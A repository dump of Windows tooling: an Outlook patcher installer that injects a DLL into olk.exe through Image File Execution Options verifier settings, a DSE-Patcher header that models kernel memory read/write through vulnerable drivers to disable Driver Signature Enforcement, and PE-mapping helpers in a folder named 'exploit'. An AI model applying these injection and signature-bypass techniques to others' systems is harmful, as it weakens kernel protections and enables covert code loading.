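#define DbgRaiseAssertionFailure() __int2c()
#endif

#define NT_ASSERT_ACTION(_exp) \
	((!(_exp)) ? \
		(__annotation((PWCHAR)L"Debug", L"AssertFail", L#_exp), \
		 DbgRaiseAssertionFailure(), FALSE) : \
		TRUE)

#define NT_ASSERTMSG_ACTION(_msg, _exp) \
	((!(_exp)) ? \
		(__annotation((PWCHAR)L"Debug", L"AssertFail", L##_msg), \
		 DbgRaiseAssertionFailure(), FALSE) : \
		TRUE)

#define NT_ASSERTMSGW_ACTION(_msg, _exp) \
	((!(_exp)) ? \
		(__annotation((PWCHAR)L"Debug", L"AssertFail", _msg), \
		 DbgRaiseAssertionFailure(), FALSE) : \
		TRUE)
#else
#define NT_ASSERT_ACTION(_exp) \
	((!(_exp)) ?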
(__debugbreak(), FALSE) : TRUE) 180 | #define NT_ASSERTMSG_ACTION(_msg, _exp) \ 181 | NT_ASSERT_ACTION(_exp) 182 | #define NT_ASSERTMSGW_ACTION(_msg, _exp) \ 183 | NT_ASSERT_ACTION(_exp) 184 | #endif 185 | 186 | #if defined(_DEBUG) || defined(DBG) 187 | #define NT_ASSERT_ASSUME(_exp) \ 188 | (NT_ANALYSIS_ASSUME(_exp), NT_ASSERT_ACTION(_exp)) 189 | 190 | #define NT_ASSERTMSG_ASSUME(_msg, _exp) \ 191 | (NT_ANALYSIS_ASSUME(_exp), NT_ASSERTMSG_ACTION(_msg, _exp)) 192 | 193 | #define NT_ASSERTMSGW_ASSUME(_msg, _exp) \ 194 | (NT_ANALYSIS_ASSUME(_exp), NT_ASSERTMSGW_ACTION(_msg, _exp)) 195 | 196 | #define NT_ASSERT NT_ASSERT_ASSUME 197 | #define NT_ASSERTMSG NT_ASSERTMSG_ASSUME 198 | #define NT_ASSERTMSGW NT_ASSERTMSGW_ASSUME 199 | #else 200 | #define NT_ASSERT(_exp) ((void) 0) 201 | #define NT_ASSERTMSG(_msg, _exp) ((void) 0) 202 | #define NT_ASSERTMSGW(_msg, _exp) ((void) 0) 203 | #endif 204 | 205 | #ifdef __cplusplus 206 | } 207 | #endif 208 | 209 | #ifdef __cplusplus 210 | #pragma warning(push) 211 | #pragma warning(disable:4309) 212 | template 213 | struct static_print // Usage: static_print()() prints the value as a compiler warning 214 | { 215 | CHAR operator()() CONST { return N + 256; } 216 | }; 217 | #pragma warning(pop) 218 | 219 | template 220 | void print_size() { static_print()(); } 221 | #endif 222 | -------------------------------------------------------------------------------- /NOP/gui/Form1.resx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | 
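System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 17, 17 122 | 123 | -------------------------------------------------------------------------------- /NOP/gui/Program.cs: --------------------------------------------------------------------------------
using Microsoft.Win32;

namespace gui
{
    internal static class Program
    {
        // Image File Execution Options key for olk.exe, 64-bit registry view.
        private const string IfeoKeyPath = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\olk.exe";
        private const string PatcherDll = "NewOutlookPatcher.dll";
        // GlobalFlag bit that turns on verifier-DLL loading for the image.
        private const int VerifierFlag = 0x100;

        /// <summary>
        /// The main entry point for the application.
        /// With no arguments the GUI is shown. Otherwise the last argument
        /// selects a headless action: "--uninstall" removes the registration
        /// and the DLL; any other value is taken as the folder that holds
        /// NewOutlookPatcher.dll and triggers an install. The process exits
        /// after a headless action.
        /// </summary>
        [STAThread]
        static void Main(string[] args)
        {
            // The last argument wins, as in the original loop.
            string tempFolderName = "";
            foreach (var arg in args)
            {
                tempFolderName = arg;
            }
            if (tempFolderName != "")
            {
                if (tempFolderName == "--uninstall")
                {
                    Uninstall();
                }
                else
                {
                    Install(tempFolderName);
                }
                Environment.Exit(0);
            }
            // To customize application configuration such as set high DPI settings or default font,
            // see https://aka.ms/applicationconfiguration.
            ApplicationConfiguration.Initialize();
            Application.Run(new Form1());
        }

        // Splits a VerifierDlls value into its space-separated entries.
        private static string[] SplitDlls(string value)
        {
            return value.Split(new[] { ' ' }, StringSplitOptions.RemoveEmptyEntries);
        }

        // True when the entry names this tool's DLL. Whole entries are compared
        // so a longer name that merely contains the DLL name is left alone.
        private static bool IsPatcherDll(string entry)
        {
            return string.Equals(entry, PatcherDll, StringComparison.OrdinalIgnoreCase);
        }

        // Removes the DLL from VerifierDlls, clears the verifier bit when no
        // other verifier DLL remains, drops the key once it is empty, then
        // deletes the DLL from the System directory. Best effort: any failure
        // ends the sequence silently, and the DLL is only deleted after the
        // registry steps went through, so the key never names a missing file.
        private static void Uninstall()
        {
            try
            {
                using RegistryKey localMachine = RegistryKey.OpenBaseKey(Microsoft.Win32.RegistryHive.LocalMachine, RegistryView.Registry64);
                using (var reg = localMachine.OpenSubKey(IfeoKeyPath, true))
                {
                    if (reg != null)
                    {
                        bool stillIsVerified = false;
                        var obj2 = reg.GetValue("VerifierDlls");
                        if (obj2 != null)
                        {
                            string verifierDlls = string.Join(" ", Array.FindAll(SplitDlls((string)obj2), entry => !IsPatcherDll(entry)));
                            if (verifierDlls == "")
                            {
                                reg.DeleteValue("VerifierDlls");
                            }
                            else
                            {
                                reg.SetValue("VerifierDlls", verifierDlls);
                                stillIsVerified = true;
                            }
                        }

                        var obj1 = reg.GetValue("GlobalFlag");
                        if (obj1 != null && !stillIsVerified)
                        {
                            int val = (int)obj1 & ~VerifierFlag;
                            if (val == 0)
                            {
                                reg.DeleteValue("GlobalFlag");
                            }
                            else
                            {
                                reg.SetValue("GlobalFlag", val);
                            }
                        }

                        if (!(reg.SubKeyCount > 0 || reg.ValueCount > 0))
                        {
                            reg.Close();
                            localMachine.DeleteSubKeyTree(IfeoKeyPath, false);
                        }
                    }
                }
                File.Delete(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), PatcherDll));
            }
            catch { }
        }

        // Copies the DLL from tempFolderName into the System directory and
        // registers it as a verifier DLL for olk.exe.
        //
        // Review caveat: once registered, the DLL in the System directory is
        // loaded into olk.exe, so this copy decides what code runs there. The
        // source folder comes from the command line and the file is copied
        // without any integrity check. The caller should pass a folder that
        // lower-privileged users cannot write to, and a hash or signature
        // check on the DLL before the copy would close the window in which
        // the file can be swapped.
        private static void Install(string tempFolderName)
        {
            try
            {
                File.Copy(Path.Combine(tempFolderName, PatcherDll), Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), PatcherDll), true);
            }
            catch { }

            // The registration runs even when the copy failed, as in the
            // original try/finally; presumably so that a reinstall still works
            // while the existing DLL is locked by a running process - confirm.
            try
            {
                using RegistryKey localMachine = RegistryKey.OpenBaseKey(Microsoft.Win32.RegistryHive.LocalMachine, RegistryView.Registry64);
                using var reg = localMachine.OpenSubKey(IfeoKeyPath, true) ?? localMachine.CreateSubKey(IfeoKeyPath);

                var obj1 = reg.GetValue("GlobalFlag");
                int flags = obj1 != null ? (int)obj1 : 0;
                reg.SetValue("GlobalFlag", flags | VerifierFlag);

                var obj2 = reg.GetValue("VerifierDlls");
                if (obj2 != null)
                {
                    string verifierDlls = ((string)obj2).Trim();
                    if (!Array.Exists(SplitDlls(verifierDlls), IsPatcherDll))
                    {
                        reg.SetValue("VerifierDlls", verifierDlls == "" ? PatcherDll : verifierDlls + " " + PatcherDll);
                    }
                }
                else
                {
                    reg.SetValue("VerifierDlls", PatcherDll);
                }
            }
            catch { }
        }
    }
}
-------------------------------------------------------------------------------- /NOP/loader2/MyFunctions.h: -------------------------------------------------------------------------------- 1 | 2 | // DSE-Patcher - Patch DSE (Driver Signature Enforcement) 3 | // Copyright (C) 2022 Kai Schtrom 4 | // 5 | // This file is part of DSE-Patcher. 6 | // 7 | // DSE-Patcher is free software: you can redistribute it and/or modify 8 | // it under the terms of the GNU General Public License as published by 9 | // the Free Software Foundation, either version 3 of the License, or 10 | // (at your option) any later version. 11 | // 12 | // DSE-Patcher is distributed in the hope that it will be useful, 13 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | // GNU General Public License for more details. 16 | // 17 | // You should have received a copy of the GNU General Public License 18 | // along with DSE-Patcher. If not, see . 19 | 20 | #ifndef _MYFUNCTIONS 21 | #define _MYFUNCTIONS 22 | 23 | // Attention: The library file msvcrt.lib is copied from "C:\WinDDK\7600.16385.1\lib\Crt\amd64". 24 | // This import library reduces the executable size and we have not to install any Microsoft 25 | // redistributables to run the executable. 26 | 27 | #define APPNAME "DSE-Patcher" 28 | #define VERSION "V1.0" 29 | #define BUILD "Build 20221127" 30 | 31 | // deprecate unsafe function warnings e.g. strcpy, sprintf 32 | #define _CRT_SECURE_NO_DEPRECATE 33 | 34 | #include 35 | #include 36 | // sprintf 37 | #include 38 | // NtQuerySystemInformation 39 | #include 40 | #include 41 | // MAX_CLASS_NAME_LEN 42 | #include 43 | // UpdateDriverForPlugAndPlayDevices 44 | #include 45 | // ACL function e.g.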
SetNamedSecurityInfo 46 | #include 47 | // PathFileExists 48 | #include 49 | #include "MyDialog1.h" 50 | 51 | // SetupAPI functions 52 | #pragma comment(lib,"setupapi.lib") 53 | // UpdateDriverForPlugAndPlayDevices 54 | #pragma comment(lib,"newdev.lib") 55 | // PathFileExists 56 | #pragma comment(lib,"shlwapi.lib") 57 | 58 | // maximum number of supported vulnerable drivers 59 | #define MAX_VULNERABLE_DRIVERS 5 60 | // maximum number of supported driver files 61 | #define MAX_DRIVER_FILES 4 62 | 63 | // NtQuerySystemInformation structures 64 | typedef struct _RTL_PROCESS_MODULE_INFORMATION 65 | { 66 | HANDLE Section; 67 | PVOID MappedBase; 68 | PVOID ImageBase; 69 | ULONG ImageSize; 70 | ULONG Flags; 71 | USHORT LoadOrderIndex; 72 | USHORT InitOrderIndex; 73 | USHORT LoadCount; 74 | USHORT OffsetToFileName; 75 | UCHAR FullPathName[256]; 76 | }RTL_PROCESS_MODULE_INFORMATION,*PRTL_PROCESS_MODULE_INFORMATION; 77 | 78 | typedef struct _RTL_PROCESS_MODULES 79 | { 80 | ULONG NumberOfModules; 81 | RTL_PROCESS_MODULE_INFORMATION Modules[1]; 82 | }RTL_PROCESS_MODULES,*PRTL_PROCESS_MODULES; 83 | 84 | // forward declaration of structure for use in function pointers of start and stop driver 85 | struct _VULNERABLE_DRIVER; 86 | 87 | // vulnerable driver structure function prototypes 88 | typedef int (*FunctionOpenDevice)(char *szDriverFile,HANDLE *hDevice); 89 | typedef int (*FunctionReadMemory)(HANDLE hDevice,DWORD64 dw64Address,DWORD dwSize,DWORD *dwValue); 90 | typedef int (*FunctionWriteMemory)(HANDLE hDevice,DWORD64 dw64Address,DWORD dwSize,DWORD dwValue); 91 | typedef int (*FunctionStartDriver)(_VULNERABLE_DRIVER *vd); 92 | typedef int (*FunctionStopDriver)(_VULNERABLE_DRIVER *vd); 93 | 94 | // driver files structure 95 | typedef struct _DRIVER_FILE 96 | { 97 | char szFilePath[MAX_PATH]; 98 | BYTE *bData; 99 | DWORD dwSize; 100 | }DRIVER_FILE,*PDRIVER_FILE; 101 | 102 | // vulnerable driver structure 103 | typedef struct _VULNERABLE_DRIVER 104 | { 105 | const char 
*szProvider; 106 | const char *szToolTipText; 107 | FunctionOpenDevice pFunctionOpenDevice; 108 | FunctionReadMemory pFunctionReadMemory; 109 | FunctionWriteMemory pFunctionWriteMemory; 110 | FunctionStartDriver pFunctionStartDriver; 111 | FunctionStopDriver pFunctionStopDriver; 112 | const char *szServiceName; 113 | const char *szDriverSymLink; 114 | // reserve space for max number of driver files (sys, inf, cat and WDFCoInstaller DLL) 115 | DRIVER_FILE driverFile[MAX_DRIVER_FILES]; 116 | const char *szHardwareId; 117 | HDEVINFO DeviceInfoSet; 118 | SP_DEVINFO_DATA DeviceInfoData; 119 | DWORD dwMinSupportedBuildNumber; 120 | DWORD dwMaxSupportedBuildNumber; 121 | }VULNERABLE_DRIVER,*PVULNERABLE_DRIVER; 122 | 123 | // patch data structure 124 | typedef struct _PATCH_DATA 125 | { 126 | // operating system 127 | const char *szOS; 128 | // module to patch 129 | const char *szModuleName; 130 | // variable name in module to patch e.g. g_CiEnabled, g_CiOptions 131 | const char *szVariableName; 132 | // DSE original value 133 | DWORD dwDSEOriginalValue; 134 | // DSE disable value 135 | DWORD dwDSEDisableValue; 136 | // DSE enable value 137 | DWORD dwDSEEnableValue; 138 | // DSE actual value 139 | DWORD dwDSEActualValue; 140 | // patch size in bytes 141 | DWORD dwPatchSize; 142 | // image base of module to patch 143 | UINT64 ui64ImageBase; 144 | // image size of module to patch 145 | ULONG ulImageSize; 146 | // variable address to patch 147 | UINT64 ui64PatchAddress; 148 | // DSE status 149 | const char *szDSEStatus; 150 | }PATCH_DATA,*PPATCH_DATA; 151 | 152 | // thread task number enumeration 153 | typedef enum 154 | { 155 | ThreadTaskReadDSEOnFirstRun = 1, 156 | ThreadTaskDisableDSE = 2, 157 | ThreadTaskEnableDSE = 3, 158 | ThreadTaskRestoreDSE = 4 159 | }THREAD_TASK_NO; 160 | 161 | // thread parameter structure 162 | typedef struct _THREAD_PARAMS 163 | { 164 | THREAD_TASK_NO ttno; 165 | }THREAD_PARAMS,*PTHREAD_PARAMS; 166 | 167 | // dialog1 structure 168 | typedef 
struct _DIALOG1 169 | { 170 | HWND hDialog1; 171 | HWND hButton1; 172 | HWND hButton2; 173 | HWND hButton3; 174 | HWND hCombo1; 175 | HWND hStatic1; 176 | HWND hStatusBar1; 177 | unsigned int uiTimerSeconds; 178 | unsigned int uiTimerMinutes; 179 | unsigned int uiTimerHours; 180 | }DIALOG1,*PDIALOG1; 181 | 182 | // globals structure 183 | typedef struct _GLOBALS 184 | { 185 | DIALOG1 Dlg1; 186 | HMODULE hInstance; 187 | unsigned char ucRunning; 188 | THREAD_PARAMS ThreadParams; 189 | VULNERABLE_DRIVER vd[MAX_VULNERABLE_DRIVERS]; 190 | PATCH_DATA pd; 191 | char szMsg[1024]; 192 | }GLOBALS,*PGLOBALS; 193 | 194 | //------------------------------------------------------------------------------ 195 | // exported functions 196 | //------------------------------------------------------------------------------ 197 | 198 | int MyInitVulnerableDrivers(VULNERABLE_DRIVER *vd,DWORD dwElements); 199 | DWORD WINAPI MyThreadProc1(PVOID pvoid); 200 | 201 | #endif // _MYFUNCTIONS 202 | 203 | -------------------------------------------------------------------------------- /exploit/pe.cpp: -------------------------------------------------------------------------------- 1 | #include "../global.h" 2 | 3 | #define IMAGE32(NtHeaders) ((NtHeaders)->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC) 4 | #define IMAGE64(NtHeaders) ((NtHeaders)->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC) 5 | 6 | #define HEADER_FIELD(NtHeaders, Field) (IMAGE64(NtHeaders) \ 7 | ? 
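((PIMAGE_NT_HEADERS64)(NtHeaders))->OptionalHeader.Field \
    : ((PIMAGE_NT_HEADERS32)(NtHeaders))->OptionalHeader.Field)

// Opens an existing, non-directory file for synchronous read access via NtCreateFile.
//
// FileHandle  Receives the opened handle; set to NULL on entry.
// Filename    DOS-style path, converted to an NT path before the open.
//
// Returns the status of the path conversion if it fails, otherwise the status of NtCreateFile.
static
NTSTATUS
RtlOpenFile(
    _Out_ PHANDLE FileHandle,
    _In_ PCWCHAR Filename
    )
{
    *FileHandle = NULL;

    UNICODE_STRING NtPath;
    RTL_RELATIVE_NAME_U RelativeName;
    NTSTATUS Status = RtlDosPathNameToRelativeNtPathName_U_WithStatus(const_cast<PWCHAR>(Filename),
                                                                      &NtPath,
                                                                      NULL,
                                                                      &RelativeName);
    if (!NT_SUCCESS(Status))
        return Status;

    // A non-empty relative name means the path is opened relative to ContainingDirectory
    const BOOLEAN PathIsRelative = RelativeName.RelativeName.Length > 0;
    OBJECT_ATTRIBUTES ObjectAttributes;
    IO_STATUS_BLOCK IoStatusBlock;
    InitializeObjectAttributes(&ObjectAttributes,
                               PathIsRelative ? &RelativeName.RelativeName : &NtPath,
                               OBJ_CASE_INSENSITIVE,
                               PathIsRelative ? RelativeName.ContainingDirectory : NULL,
                               NULL);

    Status = NtCreateFile(FileHandle,
                          FILE_GENERIC_READ | SYNCHRONIZE,
                          &ObjectAttributes,
                          &IoStatusBlock,
                          NULL,
                          FILE_ATTRIBUTE_NORMAL,
                          FILE_SHARE_READ,
                          FILE_OPEN,
                          FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
                          NULL,
                          0);

    // The converted path is released whether or not the open succeeded
    RtlFreeHeap(RtlProcessHeap(), 0, NtPath.Buffer);
    RtlReleaseRelativeName(&RelativeName);

    return Status;
}

// Maps a read-only SEC_IMAGE view of a file into the current process.
//
// Filename          DOS-style path of the image file.
// ForceDisableAslr  When TRUE, the first 0x400 bytes of the file are read, the PE headers are
//                   validated, and the header's preferred image base is requested for the view.
// ImageBase         Receives the base address of the view. Set to NULL on entry; callers should
//                   trust it only when the returned status is a success status.
// ViewSize          Receives the size of the view. Set to 0 on entry.
//
// Returns the status of the first failing native call, otherwise the mapping status.
// The file and section handles are closed on every path after the file was opened; the view
// itself is not unmapped here.
NTSTATUS
MapFileSectionView(
    _In_ PCWCHAR Filename,
    _In_ BOOLEAN ForceDisableAslr,
    _Out_ PVOID *ImageBase,
    _Out_ PSIZE_T ViewSize
    )
{
    *ImageBase = NULL;
    *ViewSize = 0;

    // Open the file
    HANDLE FileHandle = NULL;
    NTSTATUS Status = RtlOpenFile(&FileHandle, Filename);
    if (!NT_SUCCESS(Status))
    {
        printf("NtCreateFile: 0x%08X\n", Status);
        return Status;
    }
    ULONG_PTR PreferredImageBase = 0;
    HANDLE SectionHandle = NULL;
    if (ForceDisableAslr)
    {
        // Zero-initialised so that a short read never leaves stale stack bytes in the buffer
        UCHAR HeadersBuffer[0x400] = { 0 };
        IO_STATUS_BLOCK IoStatusBlock;
        Status = NtReadFile(FileHandle,
                            NULL,
                            NULL,
                            NULL,
                            &IoStatusBlock,
                            HeadersBuffer,
                            sizeof(HeadersBuffer),
                            NULL,
                            NULL);

        if (!NT_SUCCESS(Status))
        {
            printf("NtReadFile: 0x%08X\n", Status);
            goto Exit;
        }

        // Validate the headers against the number of bytes actually read, not the buffer
        // capacity: a file shorter than the buffer must not be parsed past its end.
        PIMAGE_NT_HEADERS NtHeaders;
        Status = RtlImageNtHeaderEx(0, HeadersBuffer, IoStatusBlock.Information, &NtHeaders);
        if (!NT_SUCCESS(Status))
        {
            printf("RtlImageNtHeaderEx: 0x%08X\n", Status);
            goto Exit; // a plain return here would leak FileHandle
        }
        PreferredImageBase = HEADER_FIELD(NtHeaders, ImageBase);
    }

    // Obtain a section handle
    Status = NtCreateSection(&SectionHandle,
                             STANDARD_RIGHTS_REQUIRED | SECTION_MAP_READ,
                             NULL,
                             NULL,
                             PAGE_READONLY,
                             SEC_IMAGE,
                             FileHandle);
    if (!NT_SUCCESS(Status))
    {
        printf("NtCreateSection: 0x%08X\n", Status);
        goto Exit;
    }

    // Map a read only section view
    *ImageBase = reinterpret_cast<PVOID>(PreferredImageBase);
    *ViewSize = 0;
    Status = NtMapViewOfSection(SectionHandle,
                                NtCurrentProcess,
                                ImageBase,
                                0,
                                0,
                                NULL,
                                ViewSize,
                                ViewUnmap,
                                0,
                                PAGE_READONLY);

    if (Status == STATUS_IMAGE_NOT_AT_BASE) // Fix false positive or N/A status
    {
        // With a forced base the status is accepted only if the view really is at that base;
        // without one the relocation status is not relevant to the caller.
        if (ForceDisableAslr && *ImageBase == reinterpret_cast<PVOID>(PreferredImageBase))
            Status = STATUS_SUCCESS;
        else if (!ForceDisableAslr)
            Status = STATUS_SUCCESS;
    }

    if (!NT_SUCCESS(Status))
        printf("NtMapViewOfSection: 0x%08X\n", Status);

Exit:
    NtClose(FileHandle);
    if (SectionHandle != NULL)
        NtClose(SectionHandle);

    return Status;
}

PVOID
GetProcedureAddress(
    _In_ ULONG_PTR DllBase,
    _In_ PCSTR RoutineName
    )
{
    // Find and verify PE headers
    const PIMAGE_DOS_HEADER DosHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(DllBase);
    if (DosHeader->e_magic != IMAGE_DOS_SIGNATURE)
        return NULL;
    const PIMAGE_NT_HEADERS NtHeaders = reinterpret_cast<PIMAGE_NT_HEADERS>(DllBase +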
DosHeader->e_lfanew); 161 | if (NtHeaders->Signature != IMAGE_NT_SIGNATURE) 162 | return NULL; 163 | 164 | // Get the export directory RVA and size 165 | const PIMAGE_DATA_DIRECTORY ImageDirectories = HEADER_FIELD(NtHeaders, DataDirectory); 166 | const ULONG ExportDirRva = ImageDirectories[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; 167 | const ULONG ExportDirSize = ImageDirectories[IMAGE_DIRECTORY_ENTRY_EXPORT].Size; 168 | 169 | // Read the export directory 170 | const PIMAGE_EXPORT_DIRECTORY ExportDirectory = reinterpret_cast(DllBase + ExportDirRva); 171 | const PULONG AddressOfFunctions = reinterpret_cast(DllBase + ExportDirectory->AddressOfFunctions); 172 | const PUSHORT AddressOfNameOrdinals = reinterpret_cast(DllBase + ExportDirectory->AddressOfNameOrdinals); 173 | const PULONG AddressOfNames = reinterpret_cast(DllBase + ExportDirectory->AddressOfNames); 174 | 175 | // Look up the import name in the name table using a binary search 176 | LONG Low = 0; 177 | LONG Middle = 0; 178 | LONG High = ExportDirectory->NumberOfNames - 1; 179 | 180 | while (High >= Low) 181 | { 182 | // Compute the next probe index and compare the import name 183 | Middle = (Low + High) >> 1; 184 | const LONG Result = strcmp(RoutineName, reinterpret_cast(DllBase + AddressOfNames[Middle])); 185 | if (Result < 0) 186 | High = Middle - 1; 187 | else if (Result > 0) 188 | Low = Middle + 1; 189 | else 190 | break; 191 | } 192 | 193 | // If the high index is less than the low index, then a matching table entry 194 | // was not found. 
Otherwise, get the ordinal number from the ordinal table 195 | if (High < Low || Middle >= static_cast(ExportDirectory->NumberOfFunctions)) 196 | return NULL; 197 | const ULONG FunctionRva = AddressOfFunctions[AddressOfNameOrdinals[Middle]]; 198 | if (FunctionRva >= ExportDirRva && FunctionRva < ExportDirRva + ExportDirSize) 199 | return NULL; // Ignore forwarded exports 200 | 201 | return reinterpret_cast(DllBase + FunctionRva); 202 | } 203 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | *.dll 7 | 8 | # User-specific files 9 | *.rsuser 10 | *.suo 11 | *.user 12 | *.userosscache 13 | *.sln.docstates 14 | 15 | # User-specific files (MonoDevelop/Xamarin Studio) 16 | *.userprefs 17 | 18 | # Mono auto generated files 19 | mono_crash.* 20 | 21 | # Build results 22 | [Dd]ebug/ 23 | [Dd]ebugPublic/ 24 | [Rr]elease/ 25 | [Rr]eleases/ 26 | x64/ 27 | x86/ 28 | [Ww][Ii][Nn]32/ 29 | [Aa][Rr][Mm]/ 30 | [Aa][Rr][Mm]64/ 31 | bld/ 32 | [Bb]in/ 33 | [Oo]bj/ 34 | [Oo]ut/ 35 | [Ll]og/ 36 | [Ll]ogs/ 37 | 38 | # Visual Studio 2015/2017 cache/options directory 39 | .vs/ 40 | # Uncomment if you have tasks that create the project's static files in wwwroot 41 | #wwwroot/ 42 | 43 | # Visual Studio 2017 auto generated files 44 | Generated\ Files/ 45 | 46 | # MSTest test Results 47 | [Tt]est[Rr]esult*/ 48 | [Bb]uild[Ll]og.* 49 | 50 | # NUnit 51 | *.VisualState.xml 52 | TestResult.xml 53 | nunit-*.xml 54 | 55 | # Build Results of an ATL Project 56 | [Dd]ebugPS/ 57 | [Rr]eleasePS/ 58 | dlldata.c 59 | 60 | # Benchmark Results 61 | BenchmarkDotNet.Artifacts/ 62 | 63 | # .NET Core 64 | project.lock.json 65 | project.fragment.lock.json 66 | 
artifacts/ 67 | 68 | # ASP.NET Scaffolding 69 | ScaffoldingReadMe.txt 70 | 71 | # StyleCop 72 | StyleCopReport.xml 73 | 74 | # Files built by Visual Studio 75 | *_i.c 76 | *_p.c 77 | *_h.h 78 | *.ilk 79 | *.meta 80 | *.obj 81 | *.iobj 82 | *.pch 83 | *.pdb 84 | *.ipdb 85 | *.pgc 86 | *.pgd 87 | *.rsp 88 | *.sbr 89 | *.tlb 90 | *.tli 91 | *.tlh 92 | *.tmp 93 | *.tmp_proj 94 | *_wpftmp.csproj 95 | *.log 96 | *.vspscc 97 | *.vssscc 98 | .builds 99 | *.pidb 100 | *.svclog 101 | *.scc 102 | 103 | # Chutzpah Test files 104 | _Chutzpah* 105 | 106 | # Visual C++ cache files 107 | ipch/ 108 | *.aps 109 | *.ncb 110 | *.opendb 111 | *.opensdf 112 | *.sdf 113 | *.cachefile 114 | *.VC.db 115 | *.VC.VC.opendb 116 | 117 | # Visual Studio profiler 118 | *.psess 119 | *.vsp 120 | *.vspx 121 | *.sap 122 | 123 | # Visual Studio Trace Files 124 | *.e2e 125 | 126 | # TFS 2012 Local Workspace 127 | $tf/ 128 | 129 | # Guidance Automation Toolkit 130 | *.gpState 131 | 132 | # ReSharper is a .NET coding add-in 133 | _ReSharper*/ 134 | *.[Rr]e[Ss]harper 135 | *.DotSettings.user 136 | 137 | # TeamCity is a build add-in 138 | _TeamCity* 139 | 140 | # DotCover is a Code Coverage Tool 141 | *.dotCover 142 | 143 | # AxoCover is a Code Coverage Tool 144 | .axoCover/* 145 | !.axoCover/settings.json 146 | 147 | # Coverlet is a free, cross platform Code Coverage Tool 148 | coverage*.json 149 | coverage*.xml 150 | coverage*.info 151 | 152 | # Visual Studio code coverage results 153 | *.coverage 154 | *.coveragexml 155 | 156 | # NCrunch 157 | _NCrunch_* 158 | .*crunch*.local.xml 159 | nCrunchTemp_* 160 | 161 | # MightyMoose 162 | *.mm.* 163 | AutoTest.Net/ 164 | 165 | # Web workbench (sass) 166 | .sass-cache/ 167 | 168 | # Installshield output folder 169 | [Ee]xpress/ 170 | 171 | # DocProject is a documentation generator add-in 172 | DocProject/buildhelp/ 173 | DocProject/Help/*.HxT 174 | DocProject/Help/*.HxC 175 | DocProject/Help/*.hhc 176 | DocProject/Help/*.hhk 177 | DocProject/Help/*.hhp 178 | 
DocProject/Help/Html2 179 | DocProject/Help/html 180 | 181 | # Click-Once directory 182 | publish/ 183 | 184 | # Publish Web Output 185 | *.[Pp]ublish.xml 186 | *.azurePubxml 187 | # Note: Comment the next line if you want to checkin your web deploy settings, 188 | # but database connection strings (with potential passwords) will be unencrypted 189 | *.pubxml 190 | *.publishproj 191 | 192 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 193 | # checkin your Azure Web App publish settings, but sensitive information contained 194 | # in these scripts will be unencrypted 195 | PublishScripts/ 196 | 197 | # NuGet Packages 198 | *.nupkg 199 | # NuGet Symbol Packages 200 | *.snupkg 201 | # The packages folder can be ignored because of Package Restore 202 | **/[Pp]ackages/* 203 | # except build/, which is used as an MSBuild target. 204 | !**/[Pp]ackages/build/ 205 | # Uncomment if necessary however generally it will be regenerated when needed 206 | #!**/[Pp]ackages/repositories.config 207 | # NuGet v3's project.json files produces more ignorable files 208 | *.nuget.props 209 | *.nuget.targets 210 | 211 | # Microsoft Azure Build Output 212 | csx/ 213 | *.build.csdef 214 | 215 | # Microsoft Azure Emulator 216 | ecf/ 217 | rcf/ 218 | 219 | # Windows Store app package directories and files 220 | AppPackages/ 221 | BundleArtifacts/ 222 | Package.StoreAssociation.xml 223 | _pkginfo.txt 224 | *.appx 225 | *.appxbundle 226 | *.appxupload 227 | 228 | # Visual Studio cache files 229 | # files ending in .cache can be ignored 230 | *.[Cc]ache 231 | # but keep track of directories ending in .cache 232 | !?*.[Cc]ache/ 233 | 234 | # Others 235 | ClientBin/ 236 | ~$* 237 | *~ 238 | *.dbmdl 239 | *.dbproj.schemaview 240 | *.jfm 241 | *.pfx 242 | *.publishsettings 243 | orleans.codegen.cs 244 | 245 | # Including strong name files can present a security risk 246 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 247 | #*.snk 248 | 249 | # 
